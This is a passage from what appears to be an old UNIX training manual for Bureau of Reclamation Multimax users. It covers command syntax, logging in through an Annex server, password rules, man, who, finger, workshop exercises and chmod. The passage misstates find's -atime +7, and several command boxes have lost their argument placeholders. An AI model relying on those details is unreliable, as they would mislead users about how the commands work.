relative or absolute pathname) + + +Example: + +................................................................. +. $diff memo1 memo2 . +................................................................. + + +diff - differential file comparator command + +memo1 - filename argument + +memo2 - filename argument + + +This command will tell what lines must be changed in two files to +bring them into agreement. +Here is another example that doesn't fit the general syntax for +UNIX commands. + +Example: + +................................................................. +. $find . -atime +7 -print . +................................................................. + + +find - find files + +. - the current working directory + +-atime - True if the file has been accessed in n days (n is + the +7) + +-print - always true; causes the current path name to be + printed + + +So, this command will give a listing of all files in your current +working directory that have been accessed in the past seven days. + +Some commands have several options and/or arguments; while +others, like passwd and mail, are interactive and will prompt the +user for additional input. +1.5 Correcting Mistakes + + +Because the shell and most other utilities do not interpret the +command line (or other text) until you press the (Ret) key, you +can correct typing mistakes before you press (Ret). There are +two ways to correct typing mistakes. You can erase one character +at a time, or you can back up to the beginning of the command +line in one step. After you press (Ret), it is too late to make +a correction. + + + +1.5.1 Erasing Characters + + +When entering characters from the keyboard, you can backspace up +to and over a mistake by pressing the erase key (#) one time for +each character you wish to delete. The # will appear on the +screen, and the character preceding it will be discounted. + + +Example: + +................................................................. +. $ls phajne#y . +................................................................. + + +In this example, the e will be ignored and ls phajny is sent to +the Multimax. Multiple typos can be erased; simply press one # +for each character to be erased. The erase key will back up as +many characters as you wish, but it will not back up past the +beginning of the line. + + + +1.5.2 Deleting an Entire Line + +You can delete an entire line you are entering any time before +you press (Ret) by pressing the kill key (@). When you press the +@ (kill key), the cursor moves down to the next line and all the +way to the left. The shell doesn't give you another prompt, but +it is as though the cursor is following a prompt. The operating +system does not remove the line with the mistake but instead +ignores it. Now enter the command (or text) again from the +start. +1.5.3 Aborting Program Execution + + +Sometimes you may want to terminate a running program. UNIX +might be performing a listing that is too long to display on your +screen or for some other reason you want to terminate execution. +To terminate program execution press the Delete key. The +operating system sends a terminal interrupt signal to the shell. +When the shell receives this signal, it displays a prompt and +waits for another command. + + + +1.5.4 Controlling Output to the Screen + + +There are several ways to control the flow of characters to the +screen as a result of executing a command. Such as: + + +Ctrl-S - This keyboard function command will suspend + the flow of characters to the screen as the + result of executing a command. The screen + will not continue until the keyboard function + to resume output is given. + + +Ctrl-Q - This keyboard function command will resume + the output to the screen. + + +Hold Screen - If your terminal has this key (i.e. VT200), + you can press it once to stop output to the + screen. To resume output to the screen, + press the key again. + + +Denver BOR MULTIMAX + +Each BOR Multimax 310 has four 15 Megahertz National +Semiconductor 32-bit processors with 64 kilobytes of cache memory +rated at 2 million instructions per second (MIPS) for a total of +8 MIPS. The main memory consists of 32 megabytes (million bytes). +There can be a maximum of 14 disk drives. Each drive has a +capacity of 600 megabytes for a total capacity of 8.4 gigabytes +(a gigabyte is one thousand million bytes) + +Connection to the Multimax is accomplished through one of several +methods. Access is made through TCP/IP based Annex terminal +servers. The two Annex II servers have 32 ports each and the +Annex I has 16 ports. The Annex II servers will allow up to 64 +users access to the two Multimax computers. The Annex I is used +for access to the on-line printers. CDCnet and TELNET are other +ways to gain access to the Multimaxes. + +Printouts are handled on a 600-line-per-minute line printer and a +10-page-per-minute laser printer. Each Multimax has a hardcopy +terminal and a CRT to serve as an operator console. There are two +tape drives capable of 1600 or 6250 bits per inch (bpi) on each +system. There is also a cassette tape drive. + +Software available are FORTRAN, COBOL, C, and UNISOL (an +accounting package). The database management system is INGRES by +Relational Technology, Inc. PROCOMM+ will be the communication +interface with IBM PC's and compatibles. The operating system for +the Multimax is UMAX V. UMAX V is the name for the Encore +implementation of UNIX System V. +1.6 Logging on the Annex + + +This sample session shows how the login process is displayed on +the terminal screen and is uniform for all users. To bring the +standard menu onto the screen, press the Space Bar. If you are +using a PC, first start PROCOMM+. Then when you are in the +Terminal-Mode Screen, press the Space Bar; and the MICOM menu +will appear. + + +NOTE: Login procedures from the regions are included in the + back of this manual + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ WELCOME TO THE B.O.R. NETWORK P/S:B ³ +³ SYSTEMS PRESENTLY AVAILABLE ARE: ³ +³ ³ +³ **SYSTEM** **NAME** ³ +³ ³ +³ VAX 8300'S VAX ³ +³ CYBER/CDCNET F.E. CDC ³ +³ ENCORE/UNIX MAX ³ +³ OUT DIAL OD ³ +³ ³ +³ TO SELECT A SYSTEM, ENTER THE SYSTEM ³ +³ NAME AND CARRIAGE RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 08/061. ENTER RESOURCE MAX ³ +³ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +MAX is the resource name you must enter to be connected to the +Annex, which is the Multimax front end processor. Some MICOM +menus might not have the MAX selection; in this case, enter MAX +to select the Annex. This is the same as if the menu showed the +option. +After entering MAX you will see something similar to the +following: + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ CONNECTED TO 06/011 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This indicates that you are connected to the port selector. Wait +two seconds, press (Ret) twice, and the annex prompt will appear +after a warning message. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics, Inc. ³ +³ ³ +³ ***WARNING***Unauthorized access to U.S. Government computers ³ +³ is punishable by fine and/or imprisonment. ***WARNING*** ³ +³ annex: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +1.7 Logging on the Multimax + + +To establish a connection between the Annex and the Multimax +enter the following command at the Annex prompt: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: rlogin º +º º +º host - name of the Multimax º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +The Denver Multimaxes have been assigned the names domax0 and +domax1. The names stand for the Denver Office Multimax System 0 +and 1. The domax0 is used for production of Bureau-wide +applications. The domax1 is used for training and application +development and it is the one to use for exercises associated +with this course. + + To enter domax1 type: + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ annex:rlogin domax1 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + or +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ annex:r domax1 ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +NOTE: Abbreviations are allowed for the Annex commands, the + only requirement is to type in enough characters to + make it unique. + + +When the Annex has opened communications with the selected host, +the following prompt will appear: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ login: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +To connect with the host, enter your login name at the prompt. +Your login name is assigned to you by the system administrator +and typically will be your first initial and last name, all one +word with no spaces. Only 8 characters are allowed for the +username so extra letters will be truncated. + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ login:rharding ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Once the login name has been accepted, the next prompt will be +for the password. The following prompt will appear on the +screen. + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ Password: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Enter your password. For security reasons, the host will not +display your password as you type it. + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ Password: secret ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Once you have entered the correct password. The login procedure +will continue and the following will appear on the monitor +screen. + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ UNIX System V Release ax.2.2o ns32332 ³ +³ domax1 ³ +³ Copyright (c) 1984 AT&T ³ +³ All Rights Reserved ³ +³ ***WARNING***Unauthorized access to/use of this U.S. Government ³ +³ computer is punishable by fine and/or imprisonment. ***WARNING***³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +At this point you are successfully signed on to the Multimax. +The dollar sign ($) is the default prompt for the BourneShell. + + + +1.8 Logging Off the Multimax + + +At the shell prompt $, you can logout of the Multimax using one +of the following methods: + + + 1. Enter the keyboard function command Ctrl-D. + + 2. Type the UNIX command exit. + + +Once you have entered the command to logout the following will +appear on the screen: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $exit ³ +³ CLI: Connection closed. ³ +³ annex: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Once you are back at the Annex prompt, you can establish another +connection or logout of the Annex. +1.9 Logging Off the Annex + + +When the Annex prompt (annex:) appears, you can enter the command +to logout of the Annex. The command to logout of the Annex is as +follows: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: hangup º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +There is a 60 minute inactivity timeout programmed into the +Annex; however, it is a waste of resources if you don't enter +hangup. When you are finished with your session, be sure to enter +hangup at the annex: prompt. + +If you don't type anything for 60 minutes, the Annex will log you +out of the system and display the following message: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ *** Annex Port Reset Due to Inactivity Timeout *** ³ +³ ³ +³ Annex Command Line Interpreter ³ +³ DISCONNECTED ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +When the hangup command has been entered, the following will +appear on the screen: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ annex: hangup ³ +³ ³ +³ Resetting line and disconnecting. ³ +³ ³ +³ ³ +³ Annex Command Line Interpreter * Copyright 1988 Xylogics ³ +³ annex: ³ +³ DISCONNECTED ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + + + + + + +1.10 Changing the Password + +The following command will change the password. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: passwd º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +You will be prompted to enter the existing password (this +question is skipped if you don't have a password). Next you will +be prompted to enter the new password. You will then be asked to +enter the new password again. This will verify that you have not +made a typographical error. If the two entries are the same, the +password will be changed. The new password must meet the +following criteria: + + NOTE: Some of these items are configurable by the system + administrator and these reflect the settings for the Denver + Multimax only. + + 1. Each password must have at least six characters. Only + the first eight characters are significant. + + 2. Each password must contain at least two alphabetic + characters and at least one numeric or special + character. Alphabetic characters can be upper or lower + case. + + 3. Each password must differ from the login name and + any reverse or circular shift of that login name. + For comparison purposes, an upper case letter and + its corresponding lower case letter are + equivalent. + + 4. A new password must differ from the old by at + least three characters. For comparison purposes, + an upper case letter and its corresponding lower + case character are equivalent. +Passwords on the Multimax have a thirteen-week expiration period. +At the end of the thirteen weeks, you will be required to change +your password. Once you have changed the password, you cannot +change it again for two weeks. This prevents you from +immediately changing back to the old password and eliminates a +possible security violation. If you try to change the password +before two weeks have passed since the last change, a warning +message will be displayed. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $passwd ³ +³ Changing password for teacher ³ +³ Old password: secret ³ +³ Sorry: < 2 weeks since the last change ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +NOTE: This is about as friendly as UMAX will ever get. + +Try to choose a password that is not easy for someone else to +guess. The increasing number of computer crimes involving thefts +all point to a need for protecting the system from unauthorized +access. Do not use words like your birthdate, telephone number, +spouse's name, child's name, etc. for passwords. Although you +may think passwords are an unnecessary nuisance, they are an +important way to strengthen the security of the computer system. + + +1.11 On-line Manual + + +The major source of on-line help is in the form of documentation +known as the on-line manual pages. The pages are divided into +eight sections. Section 1 contains entries for UMAX user +commands; the other sections describe administrative tools, +library functions, games, and internal system structure and +calls. + +To gain access to the on-line manual pages enter the following +command: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: man º +º º +º command - the UNIX command you want information about º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +NOTE: The name 'man' stands for manual. + + +Example: + +................................................................. +. $man ls . +................................................................. + + +This command will display the on-line manual pages for the ls +command. + +The on-line manual pages entry begins with the command name and a +one line summary followed by a synopsis of the command line +syntax. Optional flags and arguments are enclosed by square +brackets []. A detailed description of the command and all of +its options and arguments follow the synopsis. The description +can include helpful examples. At the conclusion of the entry, +related files and commands are listed. + +NOTE: Most on-line manual pages will fill more than one + screen. Be sure to control the output to your screen. +1.12 who and finger Commands + +Once you have logged onto the Multimax, you can find out who is +logged on the system with the following commands: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍË +º Command Format: who [options] º +º º +º options - see man pages for a complete list º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +The default output (no options) of the who command lists the +user's login name, terminal line, and the time that the user +logged in. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $who ³ +³ jwheeler ttyp0 Aug 15 10:26 ³ +³ mvlsdba rt02190 Aug 15 09:25 ³ +³ teacher rt020b0 Aug 15 11:07 ³ +³ eholderf rt021c0 Aug 15 11:03 ³ +³ dbowman rt01150 Aug 15 08:58 ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Options will display other information about the users that are +currently logged onto the system. Some items available are the +amount of time that has elapsed since activity occurred on that +line, the process identifier (PID) of the login process, +comments, and exit information. +A UNIX command that provides a little more information about +users that are logged in the system is the finger command. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: finger [options] [user1] º +º º +º options - see on line manual for complete list º +º º +º user1 - login name º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +The finger command with no options will list the login name, full +name, terminal name, write status (an asterisk (*) before the +terminal name indicates that write permission is denied), idle +time, login time, office location, and phone number (if known) +for each user that is currently logged in the system. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $finger ³ +³ Login Name TTY Idle When Office ³ +³ Jwheeler Jim Wheeler ttyp0 16 Wed 10:26 MP ³ +³ mvlsdba Motor Veh Lic rt02190 16 Wed 09:25 d7160 ³ +³ teacher Teacher Acct *rt020b0 Wed 11:07 ³ +³ eholderf Eileen Holder rt021c0 1 Wed 11:03 ³ +³ dbowman Dale Bowman rt01150 Wed 08:58 ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +Workshop 1 + + +This workshop will reinforce your understanding of the ideas +presented in Chapter 1. Each student is to complete the entire +workshop. + +DESK EXERCISES + + +1. What two organizations first developed UNIX? + + + + + +2. In what high level programming language is UNIX written? + + + + + +3. What are some characteristics of UNIX? + + + + + +4. What is Encore Computer Corporations implementation of UNIX + called? + + + + + +5. What part of UNIX controls the details of the computer's + internal operations? + + + + + +6. What part of UNIX allows the user to communicate with the + computer? + + + + + + + + Continue on the next page +7. What is the name of the tree-like structure under which all + data is stored? + + + + +8. What is the name of the highest level directory? + + + + + +9. What symbol represents the highest level directory? + + + + + +10. What is the general syntax of a UNIX command? + + + + + +11. What is the most common form for listing options on a + command line? + + + + + +12. What character would you use to erase a character on the + command line? + + + + +13. What character terminates the execution of a command? + + + + + +14. What is the default BourneShell prompt? + + + + + +15. How can you control the flow of output to your monitor + screen? + + +1. What annex command is entered to make a connection to the + Multimax? + + + + + +2. What is the UNIX command to change the password? + + + + + + +3. How long is your password valid? + + + + + + +4. How long do you have to wait before changing your password + again? Why? + + + + + +5. What UNIX command is used to logout of the Multimax? + + + + + + +6. What is the command to logout of the annex? + + + + + +COMPUTER EXERCISES + +7. Login to the Multimax + + + a. What did you notice when you entered the password? + + + + + b. Can you see the password as you enter it? + + + + + c. What happens if you make a mistake while entering the + password? + + + + + +8. What do you see once you have logged in? Write it here. + + + + + + + + +9. Enter the command which displays the man pages for the man + command. (Don't forget to control output to the screen.) + + + The first section is titled "NAME," what are the titles of + the other sections? + + + + + + + + +10. What are the options for the man command? + + + + + + +11. Enter the command to find out who (hint) is logged into the + system. + + + + + +12. What command will give you more information about the + current users? Try it. + + + +13. Logout of the Multimax and the Annex. + +2. FILES + + +In UNIX, all data is organized in files. An ordinary file is a +memo, source code program or shell script. A shell script or +program source code can be viewed or edited from your terminal. +Other files contain binary data, like programs for the kernel; +these files cannot be viewed or edited on the terminal. + +Peripheral devices such as disks, tape drives, printers, and +terminals are also assigned file names. Device files are +considered to be special files. They have 'special' +characteristics. Although input and output can be redirected to +and from a special file, do not attempt to display the contents +of a special file on your terminal. +3.1 File Access Modes + + +File access modes are the protections that can be assigned to +files. This protection can protect your files from unauthorized +reading or writing. You can even protect your files from +yourself (you can prevent accidental deletion). + +There are three access modes for files: + + r (read) read, examine, copy data in a file + + w (write) modify, delete a file + + x (execute) use the file as a command + + +Users with access to a file fall into one of three groups: + + u (user) the file's owner + + g (group) users in the same group + + o (other) everybody else + + +The first output field of the ls -l command is a ten character +field. Characters two through ten describe the file access +modes. A typical access mode listing looks like: + + rwxr-xr-x + +Of the nine columns, the first three describe modes for the +file's owner, the next three for his group, and the last three +for everyone else. Within each group of three, the first column +describes read access mode, the second write, and the third +execute. A letter in a column indicates access granted, a dash +(-) indicates access denied. + +Using the previous example, the user has r (read), w (write), and +x (execute) permissions. Members of the user's logical group can +read (r) or execute (x). Everyone else has read (r) and execute +(x) permissions, too. The effect of these permissions is that +the file's owner is the only one who can modify the file; but +everyone can examine, copy, or execute the file. +To change access modes on a file or directory, use the chmod +command. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: chmod º +º º +º access - access permissions º +º file1[filen] - one or more files to change permissions º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Access can be expressed in either of two forms: + + - with letters: [ugo] [+-=] [rwx] + + - with numbers: [0-7] [0-7] [0-7] + +Let's look at the method of changing the file permissions with +letters. The letters u, g, and o represent user, group, and +others, respectively. The + (plus) sign means to add the +permission and the - (minus) sign means to remove the permission. +The = (equal) sign means to set the permissions as shown. Of +course, r,w, and x are read, write, and execute. + +If, for illustration purposes, we created a file named file1 that +had the following permissions: + + rw-rwxrwx + +and you want to give yourself (user) execute permission and take +away others' (others' here means group and everyone else) write +permissions. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $chmod u+x,g-w,o-w file1 ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Now if we use the ls -la command, and look at the file +permissions for file1, they will look like this: + + rwxr-xr-x +If you want to set several protections at once use the equal +sign. The following example will set the permissions for the +user to read and execute. + +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $chmod u=rx file1 ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The second method of changing the permissions is to use the octal +digits (0-7). The octal digits 0 through 7 are represented in +binary in the following manner. + + + Octal Binary Corresponds to permissions + + 0 000 --- + 1 001 --x + 2 010 -w- + 3 011 -wx + 4 100 r-- + 5 101 r-x + 6 110 rw- + 7 111 rwx + + +Notice that every time a one digit (1) occurs in the binary +number the corresponding permissions are also set. Every time a +zero (0) occurs, the corresponding permission is denied. So to +change the file permissions in the previous example, this is the +command to enter: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $chmod 755 file1 ³ +³ $ ³ 